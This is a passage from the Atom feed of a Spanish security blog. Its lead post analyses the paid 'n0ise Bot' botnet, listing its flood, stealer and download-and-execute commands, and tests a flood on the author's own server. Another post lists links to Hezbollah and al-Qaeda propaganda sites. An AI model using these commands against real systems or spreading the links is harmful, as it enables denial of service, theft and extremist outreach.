/&gt;HTTP-Flood - httpflood*Host*Threads&lt;br /&gt;UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize&lt;br /&gt;ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize&lt;br /&gt;Multi Stealer - steal*Link to Uploadscript&lt;br /&gt;Download and Execute - downandexe*LinkToFile&lt;br /&gt;Visit Page - visit*Link&lt;br /&gt;Bot Update - update*LinkToNewBot&lt;br /&gt;Remove Bot - remove*Name&lt;br /&gt;&lt;br /&gt;Vamos una maravilla de herramienta diseñada exclusivamente para 'joder' actualmente dispone de 1.566 Zombis.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJczuxrjpuI/AAAAAAAACSI/IP-8qGPyXXQ/s1600/Captura2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="167" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJczuxrjpuI/AAAAAAAACSI/IP-8qGPyXXQ/s320/Captura2.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;Sin entrar en detalles sobre esta 'utilidad' (ya que no deja de ser un pack muy parecido a Zeus) me asombra la facilidad de conseguir este software que por cierto es de pago. Mirando el código de la aplicación aparece el sitio donde se puede comprar. (y encima te hacen un descuento de 10 euros). También me asombra lo que ellos llaman programa de afiliados, que son 'sites' donde se hace publicidad sobre su producto e intercambian en diversos foros&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #2c2c29; font-family: Tahoma; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TJOyqDNIsiI/AAAAAAAACRs/dFVy3R2eTPA/s1600/Captura3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TJOyqDNIsiI/AAAAAAAACRs/dFVy3R2eTPA/s400/Captura3.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJOyrN-ujKI/AAAAAAAACRw/u0p4bdiMKVY/s1600/Captura4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="295" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJOyrN-ujKI/AAAAAAAACRw/u0p4bdiMKVY/s320/Captura4.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Cómo se ve en la primera imagen, el precio de &lt;b&gt;n0ise Bot&lt;/b&gt; es de 50€&amp;nbsp;(solo el ejecutable sin el constructor) y 150€&amp;nbsp;(programa de por vida incluyendo actualizaciones)&lt;br /&gt;&lt;br /&gt;El pago se realiza por medio de paysafecard, un sistema de pago online. (paysafecard&amp;nbsp; es una empresa de dinero electrónico autorizada y regulada por el Financial Services Authority (FSA) en el Reino Unido).&lt;br /&gt;&lt;br /&gt;LLegado a este punto, pienso, bueno y ya que estoy aquí que podemos hacer, ¿funcionará realmente esta Botnet?. ¿Y si atacamos alguna infraestructura en China?, ¿o bien algún site con SCADA?, ¿ y si empezamos la primera ciberguerra mundial, atacando a los EEUU?. Bueno no soy tan malo y me voy a portar bien atacandome a mi mismo.Vamos a comprobarlo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¡¡EMPEZAMOS!!&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Lo primero es infectarme una máquina virtual y agregarla como soldado a mi regimiento de zombis. De esta forma podré saber como funciona el BOT y que cualidades tiene.(También me valdrá para futuros posts)&lt;br /&gt;&lt;br /&gt;De momento valga como adelanto las claves del registro que está tocando:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CLASSES_ROOT\Interface\{2e9937fc-cf2f-4f56-af54-5a6a3dd375cc}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CLASSES_ROOT\Interface\{741de825-a6f0-4497-9aa6-8023cf9b0fff}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CLASSES_ROOT\Interface\{cf54be1c-9359-4395-8533-1657cf209cfe}&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CLASSES_ROOT\CLSID\{147a976f-eee1-4377-8ea7-4716e4cdd239}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CLASSES_ROOT\Typelib\{d518921a-4a03-425e-9873-b9a71756821e}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256a51-b582-467e-b8d4-7786eda79ae0}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #666666;"&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{00a6faf1-072e-44cf-8957-5838f569a31d}&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Segundo es mandar una orden a mi ejercito para realizar una denegación de servicio sobre uno de los servidores que disponemos en la empresa y que está pensado para este tipo de cosas. Es decir totalmente segmentado y con control de tráfico de red, también disponemos de una conexión a internet dedicada&lt;br /&gt;&lt;br /&gt;Vamos a mandarle (mandarnos) un HTTP-Flood y este es el resultado en&amp;nbsp;imágenes.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJctxodAEUI/AAAAAAAACR8/f8L1JwT503o/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJctxodAEUI/AAAAAAAACR8/f8L1JwT503o/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJctzACLIUI/AAAAAAAACSA/P6lGElKXEKI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJctzACLIUI/AAAAAAAACSA/P6lGElKXEKI/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJctzeXpBTI/AAAAAAAACSE/0NDJg_rovVQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="101" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJctzeXpBTI/AAAAAAAACSE/0NDJg_rovVQ/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Si bien no&amp;nbsp;consiguieron tumbar el equipo, ni el servicio web, si que se noto un aumento muy considerable en la lentitud de nuevas conexiones,&amp;nbsp;podríamos&amp;nbsp;decir&amp;nbsp;&amp;nbsp;que la prueba ha sido satisfactoria y que 'mi' ejercito ha conseguido el objetivo de dejarme&amp;nbsp;inaccesible&amp;nbsp;el sitio web.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CONCLUSIONES&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;Me preguntaba lo sencillo que resulta realizar una denegación de servicio, no hace falta que seas un programador, ni tener experiencia en informática, tan solo tener algo de dinero, tener un contacto y alquilarte una botnet.&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;Hasta ahora la industria (por llamarlo de alguna forma) del Malware se ha centrado en obtener a través de las mafias los mayores ingresos de incautos usuarios de banca electrónica que se infectan sin saberlo, pero también es preocupante que los terroristas puedan utilizar estas 'infraestructuras'&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;¿Os imaginais que los terroristas pudieran tener el control de miles de PC's? Que tuvieran el poder de lanzar ataques a las infraestructuras de un país, (como ocurrió en el famoso ciberataque entre la disputa de Rusia y Georgia) sería demoledor y particularmente sencillo.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-354044441885274504?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/354044441885274504/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=354044441885274504' title='6 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/354044441885274504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/354044441885274504'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/09/vendo-botnets-baratas-senoras-y-senores.html' title='¡¡ Vendo Botnets baratas, Señoras y Señores...!!!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TJc2CFZEYKI/AAAAAAAACSM/WMqX_DN0lw0/s72-c/tombstone.jpg' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6624299485203065335</id><published>2010-09-08T11:45:00.000+02:00</published><updated>2010-09-08T11:45:55.921+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Delitos Telemáticos de la Guardia Civil</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://www.gdt.guardiacivil.es/webgdt/media/GDTFrase.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="80" src="https://www.gdt.guardiacivil.es/webgdt/media/GDTFrase.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quiero comunicaros una estupenda noticia, desde el &lt;b style="color: #274e13;"&gt;Grupo de Delitos Telemáticos de la Guardia Civil&lt;/b&gt;, han  creado una nueva sección, en su &lt;b style="color: #073763;"&gt;&lt;a href="https://www.gdt.guardiacivil.es/webgdt/home_alerta.php"&gt;web&lt;/a&gt;&lt;/b&gt;, de &lt;b&gt;ALERTAS DE SEGURIDAD  INFORMÁTICA&lt;/b&gt;. La pretensión es que la lean el mayor número posible  de internautas, para que cuando se encuentren con el delito, sepan  identificarlo.&lt;br /&gt;&lt;br /&gt;&lt;div class="MsoNormal"&gt;Para ello, además de la web, están en Facebook (Chema ya hablo de ello y yo al final y por huevos me tendre que volver a dar de alta) . Han creado el perfil de empresa (administración) en el que cada día publicitan en su muro la alerta de seguridad que sale en la web.Y como ellos dicen, consideran  que deben estar donde están los ciudadanos, que son su razón de  ser. Y como los ciudadanos están en las redes sociales, allí estan ellos.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;Desde ConexionInversa os  animo a que accedáis a su web y que si estáis en Facebook, los agreguéis como amigos. Y si lo hacéis, aún os hago una última petición,  que sugiráis la página a vuestros amigos.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;Cuanta más gente los lea, más gente estará prevenida ante el delito, menos delitos habrá.&lt;br /&gt;&lt;br /&gt;Venga, que todos podemos, seguro que conocemos un caso, y ante ello hay que denunciar &lt;br /&gt;&lt;br /&gt;¡¡¡ Vamos a por los malos!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-6624299485203065335?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/6624299485203065335/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=6624299485203065335' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6624299485203065335'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6624299485203065335'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/09/delitos-telematicos-de-la-guardia-civil.html' title='Delitos Telemáticos de la Guardia Civil'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-559058365588671827</id><published>2010-09-02T09:22:00.000+02:00</published><updated>2010-09-02T09:22:58.151+02:00</updated><title type='text'>Como estoy</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Hoy es un día especial, especial para mi. Puedo cometer faltas de&amp;nbsp;ortografía&amp;nbsp;, de sintaxis o de&amp;nbsp;existencialidad&amp;nbsp;en las frases, estoy con fiebres, esas fiebres que al final son una extensión de mi mismo.&lt;br /&gt;&lt;br /&gt;Muchos&amp;nbsp;sabéis&amp;nbsp;que tengo una enfermedad tropical "&lt;a href="http://www.esmas.com/salud/enfermedades/ambientales/584559.html"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;fiebre de query&lt;/span&gt;&lt;/a&gt;" jodido el&amp;nbsp;síntoma&amp;nbsp;para un informático ¿no?, coño se&amp;nbsp;podía&amp;nbsp;llamar de fiebres de 'lahostia', pero no al final de query.&lt;br /&gt;&lt;br /&gt;Hoy especialmente me siento sensible, mi capacidad de raciocinio, (como&amp;nbsp;diría&amp;nbsp;mi jefe/amigo Alberto) hoy es limitada.&lt;br /&gt;&lt;br /&gt;Pensaba escribir algo interesante que&amp;nbsp;tengo&amp;nbsp;en la chistera. Pero saldría un pufo&lt;br /&gt;&lt;br /&gt;Hoy estoy jodido, muy jodido, y aunque se que me recuperare, espero que me&amp;nbsp;perdonéis, por el lapsus, pero prometo volver en unos días. (Pedro es así, un luchador)&lt;br /&gt;&lt;br /&gt;Joder como se mueve el sofá y el comedor...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-559058365588671827?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/559058365588671827/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=559058365588671827' title='14 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/559058365588671827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/559058365588671827'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/09/como-estoy.html' title='Como estoy'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-5448234524167180057</id><published>2010-08-27T19:38:00.004+02:00</published><updated>2010-08-28T09:25:58.064+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Islam'/><category scheme='http://www.blogger.com/atom/ns#' term='Ciberterrorismo'/><title type='text'>Ciberterrorismo y propaganda</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/THf4JLAPUyI/AAAAAAAACRE/KPYHx3-i_tA/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="88" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/THf4JLAPUyI/AAAAAAAACRE/KPYHx3-i_tA/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Durante estas semanas estoy al tanto de como se utiliza internet como medio de explotación indirecta para la 'guerra de información" desde ella se utiliza métodos para engañar e influenciar el comportamiento de un público normalmente joven que tiene los suficientes medios técnicos y recursos para utilizarlos.&lt;br /&gt;&lt;br /&gt;No olvidemos que los&amp;nbsp;jóvenes&amp;nbsp;de hoy son o pueden ser potencialmente 'bombas'&amp;nbsp;tecnológicas&amp;nbsp;en el&amp;nbsp;futuro.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Es decir no deja de ser guerra&amp;nbsp;psicológica.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;El Departamento de Defensa de EE.UU, define la guerra psicológica como:&lt;/div&gt;&lt;br /&gt;"El uso planificado de propaganda y otros psicológicos acciones con la finalidad primordial de influir en las opiniones, emociones, actitudes y comportamiento de grupos extranjeros hostiles de tal manera que contribuya a la consecución de los objetivos nacionales.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Durante la semana pasada, he estado siguiendo y consiguiendo un perfil de posibles sitios legítimos de ISP's que&amp;nbsp;sabiéndolo&amp;nbsp;o no, hospedan sitios web islamistas con información&amp;nbsp;propagandística&amp;nbsp;sobre la guerra y terrorismo internacional. Desde ellos se puede sacar un perfil más exacto de personas,&amp;nbsp;ideologías&amp;nbsp;y sus seguidores. (podéis&amp;nbsp;alucinar lo que se encuentra por estos lares)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Para ello he seguido una pauta muy sencilla, primero me he creado un 'robot-araña' &amp;nbsp;que me pudiera buscar sitios web con palabras clave, una vez lanzado he utilizado &lt;a href="http://www.paterva.com/web5/"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;MALTEGO&lt;/span&gt; &lt;/a&gt;&amp;nbsp;para poder profundizar sobre alguno de los personajes que aparecen en este listado. (Joder con el Facebook, es mas sencillo), aunque maltego, cumple al 100% con esa información.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Aquí teneis algunos listados:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Disclaimer&lt;/span&gt;:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Atención!! alguno de ellos contiene datos y&amp;nbsp;vídeos&amp;nbsp;ofensivos, no me hago responsable de lo que se siente.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.facebook.com/group.php?gid=2331004717"&gt;http://www.facebook.com/group.php?gid=2331004717&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.nodo50.org/csca/agenda2003/resistencia/resistencia.html"&gt;http://www.nodo50.org/csca/agenda2003/resistencia/resistencia.html&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: arial, helvetica, clean, sans-serif; font-size: 13px;"&gt;&lt;a href="http://groups.msn.com/HEZBOALLAH" style="color: #247cd4; text-decoration: none;"&gt;http://groups.msn.com/HEZBOALLAH&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.albasrah.net/moqawama/english/iraqi_resistance.htm"&gt;http://www.albasrah.net/moqawama/english/iraqi_resistance.htm&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://hezboallahpartidoislamico.blogspot.es/"&gt;http://hezboallahpartidoislamico.blogspot.es/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://br.groups.yahoo.com/group/alqaeda/"&gt;http://br.groups.yahoo.com/group/alqaeda/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://english.moqawama.org/index.php"&gt;http://english.moqawama.org/index.php&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.islamicdigest.net/v8core/"&gt;http://www.islamicdigest.net/v8core/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://somod.shiaweb.org/"&gt;http://somod.shiaweb.org/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://alshahid.org/"&gt;http://alshahid.org/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.albasrah.net/media/sound/alberno.htm"&gt;http://www.albasrah.net/media/sound/alberno.htm&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.facebook.com/people/Moqawama-Islamiya/604466642"&gt;http://www.facebook.com/people/Moqawama-Islamiya/604466642&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.facebook.com/pages/almad-myshal-wn/11712620770"&gt;http://www.facebook.com/pages/almad-myshal-wn/11712620770&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://almashriq.hiof.no/lebanon/300/320/324/324.2/hizballah/films/"&gt;http://almashriq.hiof.no/lebanon/300/320/324/324.2/hizballah/films/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://weekly.ahram.org.eg/"&gt;http://weekly.ahram.org.eg/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;¿Que pasa? &amp;nbsp;yo lo veo claro...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Post dedicado:&lt;br /&gt;&lt;br /&gt;Dos guardias civiles destinados en Afganistán -un capitán y un alférez- y su intérprete &amp;nbsp;(de Zaragoza) -iraní nacionalizado español, de 54 años- han fallecido este miércoles en un tiroteo en la base de Qala e Naw&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-5448234524167180057?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/5448234524167180057/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=5448234524167180057' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5448234524167180057'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5448234524167180057'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/08/ciberterrorismo-y-propaganda.html' title='Ciberterrorismo y propaganda'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/THf4JLAPUyI/AAAAAAAACRE/KPYHx3-i_tA/s72-c/Captura.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-3348530537760533413</id><published>2010-08-19T17:59:00.000+02:00</published><updated>2010-08-19T17:59:47.979+02:00</updated><title type='text'>Que cosas me pasan...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TG1UXnZKQQI/AAAAAAAACQs/kx0HuUorHvQ/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TG1UXnZKQQI/AAAAAAAACQs/kx0HuUorHvQ/s200/Captura.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;div&gt;No es que sea muy dado a estas cosas pero el '&lt;a href="http://www.elladodelmal.com/"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Security Porn Sta&lt;/span&gt;r'&lt;/a&gt;&amp;nbsp;de Chema Alonso,&amp;nbsp;está cociendo un Calendario Tórrido para el año 2011. El dinero será destinado a una ONG&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Y si, ¡¡voy a participar!!, junto a mi amigo &lt;a href="http://windowstips.wordpress.com/"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Juanito&lt;/span&gt;&lt;/a&gt;.&amp;nbsp;Seremos&amp;nbsp;la portada del mes de Noviembre (Ya estoy buscando tanga y&amp;nbsp;poniéndome&amp;nbsp;cachas)&lt;br /&gt;&lt;br /&gt;Entre otros estaremos:&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Marcelo de InfoSpyware&lt;/li&gt;&lt;li&gt;Rubén Santamarta de 48 bits&lt;/li&gt;&lt;li&gt;Cristian Borghello de Segu-Info&lt;/li&gt;&lt;li&gt;Silverhack de Informática64&lt;/li&gt;&lt;li&gt;Raúl Benito de Google, y más por confirmar.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Por lo&amp;nbsp;demás&amp;nbsp;deciros que voy a participar en una ponencia en el &lt;a href="http://www.informatica64.com/aseguraitcamp2/"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;ASEGURA IT CAMP2&lt;/span&gt;&lt;/a&gt;,&amp;nbsp;así&amp;nbsp;que animaros todos los que&amp;nbsp;podáis y acercaros dado que nos lo pasaremos 'pipa' ese fin de semana en cabañas de madera a lo más puro estilo militar, yo soy el encargado de levantaros a las 6:30 de la mañana.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mientras tanto en esta&amp;nbsp;época&amp;nbsp;estival lo que toca este&amp;nbsp;próximo&amp;nbsp;fin de semana es hacerse una &lt;a href="http://www.descensodebarrancos.com/"&gt;bajada de barrancos&lt;/a&gt;, que estoy muy nervioso con esto de las relaciones personales ;-) Hala a pasarlo bien. Y la semana que viene volvemos con fuerza.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 